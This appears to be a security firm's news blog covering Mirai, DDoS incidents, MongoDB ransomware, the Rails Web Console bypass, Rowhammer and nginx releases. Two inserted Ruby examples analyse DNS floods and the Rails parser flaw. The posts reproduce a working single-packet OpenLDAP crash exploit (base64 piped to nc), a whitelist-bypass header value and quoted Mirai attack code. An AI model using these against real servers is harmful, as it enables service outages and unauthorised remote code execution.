News

Brian Krebs identifies Anna-Senpai, the Mirai botnet author

2017.01.19


Brian Krebs has most likely identified the author of the Mirai botnet, which was released last autumn and is blamed for several serious DDoS attacks.

In a very detailed article, "Who is Anna-Senpai, the Mirai Worm Author?", he summarises the results of hundreds of hours of research and tells an interesting story of DDoS, botnets, Minecraft and drama.

We recommend this article to anyone interested in the inner workings of botnet operators.

Mini spoiler alert: Mirai was most likely created and operated by the head of a company that runs DDoS protection services.




Compendium on database ransomware

2017.01.18


Binaryedge has published a compendium in which the current developments of the "Mongocalypse" can be followed.

Within a few days the number of affected MongoDB instances rose from 2,000 to 28,000, and one can assume that by now the vast majority of open databases are no longer quite so open. It is no longer only MongoDB that is affected but also ElasticSearch, Redis, Hadoop and Cassandra, as the researchers at Binaryedge have found.

It was only a matter of time before the ransomware operators turned to this field.





DDoS - the new Internet killer - podcast with All About Security

2016.11.08



In a podcast with Davor Kolaric, 8ack's CTO Markus Manzke talks about current developments in the DDoS field.

From the teaser:

Someone Is Learning How to Take Down the Internet ++ With more than one terabit per second, DDoS attacks are reaching new dimensions. ++ Attacks of this magnitude are more than a challenge for carriers and customers alike. ++ A closer look shows that such attacks will become more frequent in the future and that Germany is not immune. ++ "Markus, malicious tongues say that cutting the Internet on this scale was just a foretaste... a test run... before the total... standstill...!" ++ When is it our turn? // PART I


Link to the podcast




Someone Is Learning How to Take Down the Internet

2016.10.25



Against the background of last Friday's massive DDoS attacks, which caused outages at Twitter, Amazon, eBay, the New York Times and GitHub, rumours are growing that it may have been a test run.

[Image: outage map]

An article by Bruce Schneier from September 2016 that addresses exactly this seems relevant in this context: Someone Is Learning How to Take Down the Internet (excerpts below).

The massively increasing botnet activity we have been seeing in our sensor infrastructure since the middle of the year fits this picture exactly: in September a doubling of activity around 15 September, followed by a massive increase from 22 October.


Excerpts from "Someone Is Learning How to Take Down the Internet" by Bruce Schneier, 13 September 2016

Over the past year or two, someone has been probing the defenses of the companies that run critical pieces of the Internet. These probes take the form of precisely calibrated attacks designed to determine exactly how well these companies can defend themselves, and what would be required to take them down. We don't know who is doing this, but it feels like a large nation state. China or Russia would be my first guesses.

First, a little background. If you want to take a network off the Internet, the easiest way to do it is with a distributed denial-of-service attack (DDoS). Like the name says, this is an attack designed to prevent legitimate users from getting to the site. There are subtleties, but basically it means blasting so much data at the site that it's overwhelmed. These attacks are not new: hackers do this to sites they don't like, and criminals have done it as a method of extortion. There is an entire industry, with an arsenal of technologies, devoted to DDoS defense. But largely it's a matter of bandwidth. If the attacker has a bigger fire hose of data than the defender has, the attacker wins.

Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they're used to seeing. They last longer. They're more sophisticated. And they look like probing. One week, the attack would start at a particular level of attack and slowly ramp up before stopping. The next week, it would start at that higher point and continue. And so on, along those lines, as if the attacker were looking for the exact point of failure.

The attacks are also configured in such a way as to see what the company's total defenses are. There are many different ways to launch a DDoS attack. The more attack vectors you employ simultaneously, the more different defenses the defender has to counter with. These companies are seeing more attacks using three or four different vectors. This means that the companies have to use everything they've got to defend themselves. They can't hold anything back. They're forced to demonstrate their defense capabilities for the attacker.




Mirai - Senpai - source code of the currently most dangerous IoT botnet published

2016.10.12

The source code of the Mirai botnet, which recently earned some notoriety for the largest DDoS attack to date, has been published on a hacker forum; Mirai is similar to the BigBrother DDoS botnet in that it primarily abuses IoT devices as bots.

Alongside the source code there are extensive instructions for setting up and operating the C&C master and the loader (scanner/exploiter), with which further bots can be found and integrated into the botnet.

We are currently analysing the source code and its functionality and will publish a comprehensive article shortly.

    add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic);
    add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse);
    add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns);
    add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain);

    add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn);
    add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack);
    add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp);

    add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip); 
    add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth); 

    //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy);
    add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http);

Attached is a screenshot of the complete post:

[Screenshot of the complete forum post]




Online test for the current OpenSSL vulnerability (CVE-2016-2107)

2016.05.04

Filippo Valsorda provides an online test that checks TLS setups for the current OpenSSL vulnerability.

Alongside the check-as-a-service, the source code is available and includes, among other things, a CLI tool:

[ usr@sonnendeck :~/] > go run CVE-2016-2107 8ack.de
2016/05/04 21:15:24 Vulnerable: false

[ usr@sonnendeck :~/] > go run CVE-2016-2107 linkedin.com
2016/05/04 21:15:37 Vulnerable: true





How I Hacked Facebook, and Found Someone's Backdoor Script

2016.05.03


A Chinese hacker with the pseudonym "Orange Tsai" managed to gain remote access to a server in Facebook's network. While looking for worthwhile targets for a bug bounty payout, he found an appliance named "files.fb.com" that was used for file exchange and contained an RCE vulnerability.

During the hack he came across another intruder who had had access to the appliance since July of the previous year and who, among other things, had modified the appliance's login scripts so that username/password combinations were logged and transferred out. Since access to files.fb.com was tied to AD credentials AND services such as OWA (https://mail.thefacebook.com/owa/) are reachable from outside, the fact that user/password combinations were being harvested is at the very least worrying.

In addition, the previous intruder had installed a backdoor that allowed external access to the server.

Chapeau, Orange!





Nginx 1.10 released: TCP/UDP load balancing, HTTP/2, dynamic modules

2016.04.29


Nginx has released version 1.10, which carries the new features from the 1.9 mainline branch over into the stable branch.


The following features are now available:

  • TCP/UDP stream module: enables TCP/UDP load balancers
  • HTTP/2, successor to the SPDY protocol
  • dynamic modules allow individual modules to be compiled and updated separately
  • SSLv3 has been disabled completely

We have been using the LB features since the middle of last year; above all, the built-in allow/deny and limit options convinced us to rely exclusively on Nginx for simple LB tasks.

Complete feature list of the 1.10 branch:

    *) Feature: the ngx_http_perl_module can be built dynamically.

    *) Feature: UDP support in the stream module.

    *) Feature: the "aio_write" directive.

    *) Feature: now cache manager monitors number of elements in caches and
       tries to avoid cache keys zone overflows.

    *) Feature: Huffman encoding of response headers in HTTP/2.
       Thanks to Vlad Krasnov.

    *) Feature: the "worker_cpu_affinity" directive now supports more than
       64 CPUs.

    *) Feature: TCP support in resolver.

    *) Feature: dynamic modules.

    *) Feature: the "auto" parameter of the "worker_cpu_affinity" directive.

    *) Feature: pwritev() support.

    *) Feature: the "include" directive inside the "upstream" block.

    *) Feature: the ngx_http_slice_module.

    *) Feature: the "nohostname" parameter of logging to syslog.

    *) Feature: the "proxy_cache_convert_head" directive.

    *) Feature: the $realip_remote_addr variable in the
       ngx_http_realip_module.

    *) Feature: the ngx_http_v2_module (replaces ngx_http_spdy_module).
       Thanks to Dropbox and Automattic for sponsoring this work.

    *) Feature: the "tcp_nodelay" directive in the stream module.

    *) Feature: multiple "sub_filter" directives can be used simultaneously.

    *) Feature: variables support in the search string of the "sub_filter"
       directive.

    *) Feature: connection limiting in the stream module.

    *) Feature: data rate limiting in the stream module.

    *) Feature: the "backlog" parameter of the "listen" directives of the
       mail proxy and stream modules.

    *) Feature: the "allow" and "deny" directives in the stream module.

    *) Feature: the "proxy_bind" directive in the stream module.

    *) Feature: the "proxy_protocol" directive in the stream module.

    *) Feature: the -T switch.

    *) Feature: the REQUEST_SCHEME parameter added to the fastcgi.conf,
       fastcgi_params, scgi_params, and uwsgi_params standard configuration
       files.

    *) Feature: the $upstream_connect_time variable.


    *) Feature: the "zone" directive inside the "upstream" block.

    *) Feature: the stream module.

    *) Feature: byte ranges support in the ngx_http_memcached_module.
       Thanks to Martin Mlynář.

    *) Feature: shared memory can now be used on Windows versions with
       address space layout randomization.
       Thanks to Sergey Brester.

    *) Feature: the "error_log" directive can now be used on mail and server
       levels in mail proxy.



DET - Data Exfiltration Toolkit

2016.03.30

Paul Sec (Twitter: @PaulWebSec) of SensePost has published a toolkit for exfiltrating data from networks: DET - Data Exfiltration Toolkit. DET was presented at BSidesLjubljana in March 2016; the slides are available.

Several back-channels are available for data transfer, optionally with XOR obfuscation or AES encryption:

Further functions are on the roadmap, such as back-channels via Skype, Tor, Gist/GitHub, FTP or steganography, as well as compression.

DET in action:

Server side:

[asciicast]

Client side:

[asciicast]





ElasticZombie among the top 10 AlienVault blogs of 2015

2016.01.07


The article "ElasticZombie Botnet - Exploiting Elasticsearch Vulnerabilities", which appeared on the AlienVault blog in early December as part of our technology partnership with AlienVault, was voted into the top 12 list for 2015.




using nginx + naxsi to fight against the latest Joomla-0-Day and PHP-Object-Injection generally

2015.12.15




Attacks on the DNS root servers

2015.12.09



Image source: Joy of Tech

On 30 November and 1 December the root servers of the DNS infrastructure were attacked. The attack led to partial outages of the upstream infrastructure but had no effect on the functioning of the DNS infrastructure as a whole.

The attack came in two waves, each with more than 5 million queries per second against the entire DNS root server infrastructure; the advisory below explains further details.


Source: http://root-servers.org/news/events-of-20151130.txt

Root Server Operators                                            rootops 
http://root-servers.org
                                                        December 4, 2015


                          Events of 2015-11-30

Abstract

   On November 30, 2015 and December 1, 2015, over two separate
   intervals, several of the Internet Domain Name System's root name
   servers received a high rate of queries.  This report explains the
   nature and impact of the incident.

   While it's common for the root name servers to see anomalous traffic,
   including high query loads for varying periods of time, this event
   was large, noticeable via external monitoring systems, and fairly
   unique in nature, so this report is offered in the interests of
   transparency.


1.  Nature of Traffic

   On November 30, 2015 at 06:50 UTC DNS root name servers began
   receiving a high rate of queries.  The queries were well-formed,
   valid DNS messages for a single domain name.  The elevated traffic
   levels continued until approximately 09:30 UTC.

   On December 1, 2015 at 05:10 UTC DNS root name servers again received
   a similar rate of queries, this time for a different domain name.
   The event traffic continued until 06:10 UTC.

   Most, but not all, DNS root name server letters received this query
   load.  DNS root name servers that use IP anycast observed this
   traffic at a significant number of anycast sites.

   The source addresses of these particular queries appear to be
   randomized and distributed throughout the IPv4 address space.  The
   observed traffic volume due to this event was up to approximately 5
   million queries per second, per DNS root name server letter receiving
   the traffic.


2.  Impact of Traffic

   The incident traffic saturated network connections near some DNS root
   name server instances.  This resulted in timeouts for valid, normal
   queries to some DNS root name servers from some locations.






   Several DNS root name servers were continuously reachable from
   virtually all monitoring stations for the entire duration of the
   incident.

   There are no known reports of end-user visible error conditions
   during, and as a result of, this incident.  Because the DNS protocol
   is designed to cope with partial reachability among a set of name
   servers, the impact was, to our knowledge, limited to potentially
   minor delays for some name lookups when a recursive name server needs
   to query a DNS root name server (e.g. a cache miss).  This would have
   manifested itself as a barely perceptible initial delay in some web
   browsers or other client programs (such as "ftp" or "ssh").

   Visibility of this event came about as a result of health monitoring
   by DNS root name server operators and other monitoring projects
   around the Internet.  Often these are in the form of "strip chart"
   graphics showing response time variance of a periodic simple query
   against some set of servers, including DNS root name servers.  Such
   test traffic may not be indicative of what happens to normal traffic
   or user experience.


3.  Analysis

   This event was notable for the fact that source addresses were widely
   and evenly distributed, while the query name was not.  This incident,
   therefore, is different from typical DNS amplification attacks
   whereby DNS name servers (including the DNS root name servers) have
   been used as reflection points to overwhelm some third party.

   The DNS root name server system functioned as designed, demonstrating
   overall robustness in the face of large-scale traffic floods observed
   at numerous DNS root name servers.

   Due to the fact that IP source addresses can be easily spoofed, and
   because event traffic landed at large numbers of anycast sites, it is
   unrealistic to trace the incident traffic back to its source.

   Source Address Validation and BCP-38 should be used wherever possible
   to reduce the ability to abuse networks to transmit spoofed source
   packets.









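Section 3 of the advisory tells the two traffic shapes apart by how widely the source addresses are spread and how concentrated the query name is. The following added example (not part of the advisory or of any root-server tooling) runs that triage over constructed query-log lines; the log format, the thresholds and the sample addresses are assumptions made for the demonstration.

```ruby
require "time"

# Thresholds for the toy classifier; chosen for the constructed sample below,
# not taken from the root-server report (assumption).
RATE_FLOOR     = 500.0 # queries/s above which a window counts as elevated
SPREAD_HIGH    = 0.90  # distinct sources / queries: near 1.0 = almost every query from a fresh address
SPREAD_LOW     = 0.05  # very few sources for many queries: spoofed-victim pattern of reflection abuse
QNAME_DOMINANT = 0.80  # share held by the single most common query name

Query = Struct.new(:ts, :src, :qname, :qtype)

# Parse "<ISO-8601 time> <source IP> <qname> <qtype>" lines (constructed log format).
def parse_log(text)
  text.each_line.map do |line|
    ts, src, qname, qtype = line.split
    next if qtype.nil?
    Query.new(Time.iso8601(ts), src, qname, qtype)
  end.compact
end

# Summarise one capture window along the two axes the analysis section used:
# source-address spread versus query-name concentration, plus the raw rate.
def profile(queries)
  return { verdict: :empty } if queries.empty?
  times     = queries.map(&:ts)
  span      = [times.max - times.min, 1.0].max
  qps       = queries.size / span
  spread    = queries.map(&:src).uniq.size.to_f / queries.size
  top_share = queries.group_by(&:qname).values.map(&:size).max.to_f / queries.size
  verdict =
    if qps < RATE_FLOOR
      :baseline
    elsif spread >= SPREAD_HIGH && top_share >= QNAME_DOMINANT
      :random_source_flood   # many spoofed sources, one name: the 2015-11-30 profile
    elsif spread <= SPREAD_LOW
      :reflection_pattern    # one or few (victim) sources: classic amplification abuse
    else
      :elevated_unclassified
    end
  { qps: qps.round(1), source_spread: spread.round(3),
    top_qname_share: top_share.round(3), verdict: verdict }
end

# --- constructed samples (not real traffic) --------------------------------

# Build `count` log lines starting at t0, spaced `gap` seconds apart; the block
# returns "<src> <qname>" for query number i.
def synth(count, t0, gap, qtype)
  Array.new(count) do |i|
    "#{(t0 + i * gap).utc.iso8601(3)} #{yield(i)} #{qtype}"
  end.join("\n")
end

T0 = Time.utc(2015, 11, 30, 6, 50, 0)

# Flood: 3000 queries in 3 s, each from a different address, all for one name.
FLOOD_LOG = synth(3000, T0, 0.001, "A") { |i| "#{1 + i % 200}.#{i / 200}.77.1 flood-target.example." }

# Reflection: same rate, but every query carries the victim's address as its
# source and asks for varying names with type ANY.
REFLECT_LOG = synth(3000, T0, 0.001, "ANY") { |i| "198.51.100.23 name#{i % 40}.example." }

# Baseline: 60 queries over a minute from a handful of resolvers.
BASELINE_LOG = synth(60, T0, 1.0, "A") { |i| "203.0.113.#{i % 8} host#{i % 30}.example." }

if __FILE__ == $PROGRAM_NAME
  { flood: FLOOD_LOG, reflection: REFLECT_LOG, baseline: BASELINE_LOG }.each do |name, log|
    puts "#{name}: #{profile(parse_log(log))}"
  end
end
```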




Debian drops ElasticSearch (DSA-3389-1 elasticsearch -- end-of-life)

2015.11.23

In a security advisory (DSA 3389) Debian announces that it will no longer carry ElasticSearch in its repositories; the reason given is Elastic.co's lack of willingness to provide security advisories, which makes backporting security fixes impossible.

Security support for elasticsearch in jessie is hereby discontinued. The project no longer releases information on fixed security issues which allows backporting them to released versions of Debian and actively discourages from doing so.

elasticsearch will also be removed from Debian stretch (the next stable Debian release), but will continue to remain in unstable.




Google switches to BoringSSL

2015.10.22


Google has switched its entire infrastructure (servers & services) and code base (Chromium, Android) from OpenSSL to BoringSSL; in a detailed article Adam Langley and David Benjamin explain further details:

We recently switched Google's two billion line repository over to BoringSSL, our fork of OpenSSL. This means that BoringSSL is now powering Chromium (on nearly all platforms), Android M and Google's production services. For the first time, the majority of Google's products are sharing a single TLS stack and making changes no longer involves several days of work juggling patch files across multiple repositories.





SYNful Knock - worldwide scans

2015.09.21

[Image: SYNful Knock scans, global distribution of compromised Cisco routers, (c) copyright ShadowServer.org]

On 15 September FireEye published a report on potentially compromised Cisco routers, also known as "SYNful Knock".

Over the past few days several projects (shadowserver.org, zmap.io) have scanned the Internet for routers that respond to the corresponding requests.

The ShadowServer scans found 119 potentially vulnerable routers, Zmap found 79:

The implant is fingerprintable and we are able to scan for infected servers without invoking the vulnerability by modifying ZMap to send the specially crafted TCP SYN packets. We completed four scans of the public IPv4 address space on September 15, 2015 and found 79 hosts displaying behavior consistent with the SYNful Knock implant. These routers belong to a range of institutions in 19 countries. We have found no immediate pattern in the organizations affected, but note a surprising number of routers in Africa and Asia (compared to IP allocations). We note that the 25 hosts in the United States belong to a single service provider on the East Coast, and that the hosts in both Germany and Lebanon belong to a single satellite provider that provides coverage to Africa.

The two tables show the respective scan results:

[Table: zmap.io scan results]


[Table: shadowserver scan results]





Vulnerability in OpenLDAP allows single-packet DoS

2015.09.18

An advisory published on the FD mailing list warns of a DoS vulnerability in the OpenLDAP server: an attacker can crash the OpenLDAP server with a single packet; no authentication is required.

Conveniently, the advisory ships the matching exploit as well:

echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

BOOM HEADSHOT

Updates are available for the common distributions.




Bypass WAF Cookbook

2015.09.03

Source: Bypass WAF Cookbook @ wyoon


The DROPS blog has published an extensive "Bypass WAF Cookbook" that covers current scenarios and methods for bypassing web application firewalls; alongside the "usual suspects" such as %Unicode, double encoding or whitespace injection, methods such as HTTP parameter pollution, bypass via whitelists, bypass under high CPU load or bypass by circumventing boundary checks are also discussed.

The handbook is a solid piece of work for testing one's own WAF installation against known and commonly used bypass techniques.






HipChat for Jira Remote Code Execution

2015.09.03

  • Source: JIRA and HipChat for JIRA plugin Security Advisory 2015-08-26
  • Date of Advisory: 26/August/2015 (UTC)
  • CVE ID: CVE-2015-5603
  • Product: JIRA and the HipChat for JIRA plugin.
  • Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
  • Affected JIRA product versions: 6.3.5 <= version < 6.4.11
  • Login/Authentication required: yes

Summary of Vulnerability

This advisory discloses a critical severity security vulnerability that was introduced in version 1.3.2 of the HipChat for JIRA plugin. Versions of the HipChat for JIRA plugin starting with 1.3.2 before 6.30.0 (the fixed version) are vulnerable. Vulnerable versions of the HipChat for JIRA plugin were bundled by default with JIRA since JIRA version 6.3.5, up to but not including 6.4.11 (the fixed version).

Atlassian Cloud instances have already been upgraded to a version of the HipChat for JIRA plugin which does not have the issue described on this page. Customers who have updated the HipChat For JIRA plugin to version 6.30.0 or higher are not affected. Customers who have downloaded and installed JIRA >= 6.3.5 < 6.4.11 and have not updated the HipChat For JIRA plugin to 6.30.0 or higher should update those instances of the HipChat For JIRA plugin for their JIRA installations in order to fix this vulnerability. Customers who have installed the HipChat For JIRA plugin in JIRA, and are running a version of the plugin equal to or above 1.3.2 and less than 6.30.0, should either update those instances of the HipChat For JIRA plugin or their JIRA installations to fix this vulnerability.

Severity:

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels (https://www.atlassian.com/security/security-severity-levels). The scale allows us to rank a severity as critical, high, moderate, or low. This is an independent assessment and you should evaluate its applicability to your own IT environment.

Description:

We internally discovered that the HipChat For JIRA plugin had a resource that combined user input into a velocity template source and subsequently rendered it. Authenticated attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of the HipChat For JIRA plugin enabled. To exploit this issue attackers need to be able to access the JIRA web interface and log into JIRA.

All versions of HipChat For JIRA plugin from 1.3.2 before 6.30.0 are affected by this vulnerability.

All versions of JIRA from 6.3.5 before 6.4.11 are affected by this vulnerability. This issue can be tracked here: https://jira.atlassian.com/browse/JRA-44831

Fix:

We have taken the following steps to address this issue:

  • Released a new version, 6.30.0, of the HipChat For JIRA plugin
  • Released JIRA version 6.4.11 that updates the bundled copy of the HipChat For JIRA plugin to a fixed version.

Remediation:

Upgrade the HipChat for JIRA plugin to version 6.30.0 or higher. For instructions on how to update add-ons like the HipChat For JIRA plugin see https://confluence.atlassian.com/display/UPM/Updating+add-ons. Optionally upgrade JIRA to version 6.4.11 which bundles a fixed version of the HipChat For JIRA plugin.

Risk Mitigation:

If you are unable to upgrade your JIRA server or the HipChat for JIRA plugin, then as a temporary workaround, you can disable or uninstall the HipChat For JIRA plugin in JIRA.

Support:

If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/ .


Read more in the official advisory: JIRA and HipChat for JIRA plugin Security Advisory 2015-08-26




NGINX book from O'Reilly available as a free version

2015.07.31

Igor Sysoev has announced a new Nginx book from O'Reilly on the Nginx mailing list: "nginx: A Practical Guide to High Performance"; as a goodie, the preview edition is available as a free download on nginx.com.

Nearly 20 years ago I read my first O’Reilly book, Learning Perl. Back then I never would have dreamed O’Reilly would someday publish a book written about the software I created, yet here we are today.

I am honored to announce that later this year O’Reilly Media will publish one of their iconic animal books entitled nginx: A Practical Guide to High Performance, and I’m delighted to offer you a preview edition download today. This five chapter preview covers:

  • How to install nginx
  • How to use nginx as a software load balancer
  • How to set up nginx as a reverse proxy for serving dynamic web applications
  • How to tune nginx for optimal performance and security
  • And more!

I hope you enjoy the book.

Igor Sysoev




Nginx 1.9.3 with new stream features

2015.07.14

The Nginx team has released version 1.9.3 and continues to extend the functionality of the stream module introduced in the 1.9 branch; with the stream module Nginx can be run as a pure TCP load balancer. An article explains various deployment scenarios.

After the stream functionality became generally available in version 1.9.0, IP-based access control (allow/deny) was added in the following versions. In the new version the stream module offers further features for controlling access: connection limiting and data rate limiting are now available.

For load balancing, several methods can be chosen in the stream module:

  • least_conn - the upstream server with the fewest connections is selected
  • least_time - the upstream server with the fastest connection time is selected
  • hash - guarantees IP-based stickiness

user nginx;
worker_processes        auto; # number of worker processes

events {
    worker_connections  1024;
}

pid /var/run/nginx/nginx.pid;

stream {
    upstream udx_backend {
        least_conn;     # pick the upstream with the fewest active connections
        server udx1.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx2.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx3.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx4.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx5.srv.my:2342 max_fails=3 fail_timeout=10s;
        server udx6.srv.my:2342 max_fails=3 fail_timeout=10s backup;
    }

    server {
        # allow/deny rules are evaluated in order and the first match wins,
        # so the single host to be excluded must be denied before its /24 is allowed
        deny  192.168.12.12;
        allow 192.168.12.0/24;
        allow 127.0.0.1;
        deny  all;

        listen     2342;
        proxy_pass udx_backend;
    }
}



RAILS IP Whitelist Bypass and Remote Code Execution (CVE-2015-3224)

2015.06.18

The web console introduced in Ruby on Rails 4.2 has a fundamental flaw that allows an attacker to bypass any IP restrictions; the vulnerability was published by @joernchen:

However with Rails Versions 4.1 and 4.0 the Web Console built in IP whitelist is bypassable. This is due to the fact that Web Console parses the request.remote_ip to check if the IP is whitelisted with the Ruby class IPAddr.

Due to this parser differential an attacker might bypass the Web Console IP whitelist by supplying a HTTP header value of:

X-Forwarded-For: 0000::1

Updates are available and should be applied if the console is in use.

In general it is recommended to use the Rails console only in development systems and not in live systems.
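The parser differential quoted above, as an added example that is neither the advisory's nor Rails' own code: a string-level trusted-proxy filter modelled on the regex Rails 4.1 used (simplified here, an assumption) decides which X-Forwarded-For entry becomes the client address, while the console whitelist compares IPAddr objects, so "0000::1" slips past the first and matches the second. The hardened variant parses every candidate before comparing; the whitelist and the peer address are constructed.

```ruby
require "ipaddr"

# String-level filter for loopback/private proxies, modelled on the textual
# trusted-proxy regex of Rails 4.1 (simplified; an assumption, not the exact
# upstream constant).
TEXTUAL_TRUSTED = %r{\A127\.0\.0\.1\z | \A::1\z | \A10\. | \A192\.168\.}x

# The same trust set as address objects, for the hardened variant below.
TRUSTED_RANGES = %w[127.0.0.1 ::1 10.0.0.0/8 192.168.0.0/16].map { |r| IPAddr.new(r) }

# Console whitelist: loopback only, held as IPAddr objects the way web-console does.
CONSOLE_WHITELIST = %w[127.0.0.1 ::1].map { |ip| IPAddr.new(ip) }

# Keep only syntactically valid single addresses from a comma-separated header;
# "0000::1" passes this check because IPAddr parses it as ::1.
def ips_from(header)
  header.to_s.split(/[,\s]+/).select do |ip|
    begin
      range = IPAddr.new(ip).to_range
      range.begin == range.end
    rescue ArgumentError
      false
    end
  end
end

# Vulnerable derivation: walk X-Forwarded-For from the right, skipping entries
# the *string* filter recognises as proxies, else fall back to the socket peer.
def remote_ip_textual(peer_addr, xff)
  candidates = ips_from(xff).reverse + [peer_addr]
  candidates.reject { |ip| ip =~ TEXTUAL_TRUSTED }.first || peer_addr
end

# Hardened derivation: parse first, then compare address objects, so every
# spelling of the loopback address is treated as the trusted proxy it is.
def remote_ip_parsed(peer_addr, xff)
  candidates = ips_from(xff).reverse + [peer_addr]
  candidates.reject do |ip|
    addr = IPAddr.new(ip)
    TRUSTED_RANGES.any? { |t| t.include?(addr) }
  end.first || peer_addr
end

# web-console style check: is the derived client address on the whitelist?
def console_allowed?(remote_ip)
  addr = IPAddr.new(remote_ip)
  CONSOLE_WHITELIST.any? { |w| w.include?(addr) }
end

if __FILE__ == $PROGRAM_NAME
  peer   = "203.0.113.5" # external client's socket address (constructed)
  header = "0000::1"     # the header value from the advisory
  %w[remote_ip_textual remote_ip_parsed].each do |variant|
    ip = send(variant, peer, header)
    puts "#{variant}: remote_ip=#{ip} console_allowed=#{console_allowed?(ip)}"
  end
end
```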





New LibreSSL mailing lists

2015.06.04

The OpenSSL team has set up two new mailing lists to give discussions around the LibreSSL project their own platform. Alongside the list libressl@openbsd.org for general and technical matters, the list libressl-security@openbsd.org has also been set up for reporting bugs and problems to the developers.

Original message @ misc@openbsd.org:

We have two new lists for LibreSSL:

libressl@openbsd.org - public list for technical discussion about
LibreSSL on any operating system.

libressl-security@openbsd.org - private list for reporting severe
vulnerabilities in OpenSSL or LibreSSL to the core LibreSSL team.


See http://www.openbsd.org/mail.html for more details.



SSLLabs downgrades servers with weak DH parameters

2015.05.21

As of today, 21 May 2015, SSLLabs rates servers with weak (<2048-bit) DH parameters with a "B", thereby downgrading servers that are potentially susceptible to the Logjam vulnerability.

From the blog post:

Weak DH Parameters

Even though for most sites there isn't an immediate vulnerability if they're using 1024-bit DH parameters (state attacks are not part of most sites' threat model), such parameters are weak and should be discouraged. We have been warning about weak DH parameters for a long time; now, with the announcement of Logjam, we feel that it's a good time to move one step further. As of yesterday, sites that continue to use weak DH parameters are capped at B.





A Javascript-based DDoS Attack as seen by Safe Browsing (GitHub's GreatDDoS)

2015.04.25

Google's Safe Browsing team analyses millions of websites every month, examining them for malicious code, exploits, injections and other content dangerous to users.

At the end of March there was a massive DDoS attack on GitHub that paralysed the site for days. The cause of the DDoS was found after a short time: randomly selected visitors to Chinese websites were served injected JavaScript code that made their browsers request selected pages on GitHub. The sheer volume then amounted to a DDoS against GitHub.

The Safe Browsing team also observed these injections and analysed them in an article:

In the middle of March, several sources reported a large Distributed Denial-of-Service attack against the censorship monitoring organization GreatFire. Researchers have extensively analyzed this DoS attack and found it novel because it was conducted by a network operator that intercepted benign web content to inject malicious Javascript. In this particular case, Javascript and HTML resources hosted on baidu.com were replaced with Javascript that would repeatedly request resources from the attacked domains.

While Safe Browsing does not observe traffic at the network level, it affords good visibility at the HTTP protocol level. As such our infrastructure picked up this attack, too. Using Safe Browsing data, we can provide a more complete timeline of the attack and shed light on what injections occurred when.





SSLLabs publishes a CLI client for the SSLLabs API

2015.03.17


SSLLabs has published a Go-based client for the recently released SSLLabs API on GitHub. It can scan a single host or a list of hosts, and its JSON output can in turn be imported into a database; the corresponding database schema, which also underlies SSL Pulse, was published along with it.

The licence terms for using the API are somewhat restrictive: you may scan any number of servers that are under your own control, but you may not, for example, build the API into products and thereby offer SSLLabs results to third parties.




Farewell, Google-Code, and thanx for all the fish

2015.03.12


Google Code, Google's code-hosting platform, is closing its doors in January 2016. As of today, 12 March, no new projects can be created; from August 2015 all repositories will be read-only, and from January until the end of 2016 only archived downloads will be available.

In a blog post the Google team points out the changes, gives migration hints for GitHub or Bitbucket, and recommends that existing projects use the "This project moved" function to keep deep links working; links to the project on Google Code are then turned into redirects to the new project.





Is Google about to tell the world that your site is too slow? (via nccgroup)

2015.03.12




Rowhammer - FAQ for server operators

2015.03.10

Google's Project Zero team has reported a way to gain elevated access on Linux and OS X computers by means of bit flips. Robert Graham has collected a short summary of the bug in a blog post.

We publish here a short FAQ for server operators with the most important questions and answers:

  • Can the vulnerability be exploited remotely on servers? - No. Exploiting it requires local access, because directly addressed memory regions have to be read in rapid succession.

  • Does ECC RAM protect against the vulnerability? - Maybe, maybe not. ECC RAM can detect and correct single bit flips. If an attacker manages to manipulate 2 bits at once, in the best case the affected process halts (DoS); 3 simultaneous bit flips may go undetected by ECC RAM.

  • Are virtual machines affected? - So far there are no reports of access from one virtual machine to another or to the hypervisor, since the hypervisor applies a different memory mapping and memory is not mapped directly into the virtual machine:

    Unlike operating systems, hypervisors don't expose the physical mapping to the virtual machines. The upshot of this is that people running VMs in the cloud do not have to worry about other customers using this technique to hack them. It's probably not a concern anyway, since most cloud systems use error correcting memory, but the VM translation makes it extra hard to crack. (Robert Graham)

  • Is the vulnerability easy to exploit for local users? - Depending on the hardware: the Google team found a way to exploit it on 50% of the tested notebooks; Reddit users report that the rowhammer PoC had to run between 3 minutes and 3 hours to produce bit flips. When in doubt the answer should therefore be "yes, the vulnerability is easy to exploit", especially in view of the uncertainty around ECC RAM.

  • Are there mitigations? - Cisco describes mitigations, which however depend on specific chipsets and thus on the hardware:

    This vulnerability exists within hardware and cannot be mitigated by just upgrading software. The following are the two widely known mitigations for the Row Hammer issue:

    - Two times (2x) refresh – is a mitigation that has been commonly implemented on server based chipsets from Intel since the introduction of Sandy Bridge and is the suggested default. This reduces the row refresh time by the memory controller from 64ms to 32ms and shrinks the potential window for a row hammer, or other gate pass type memory error to be introduced.

    - Pseudo Target Row Refresh (pTRR) – available in modern memory and chipsets. pTRR does not introduce any performance and power impact.

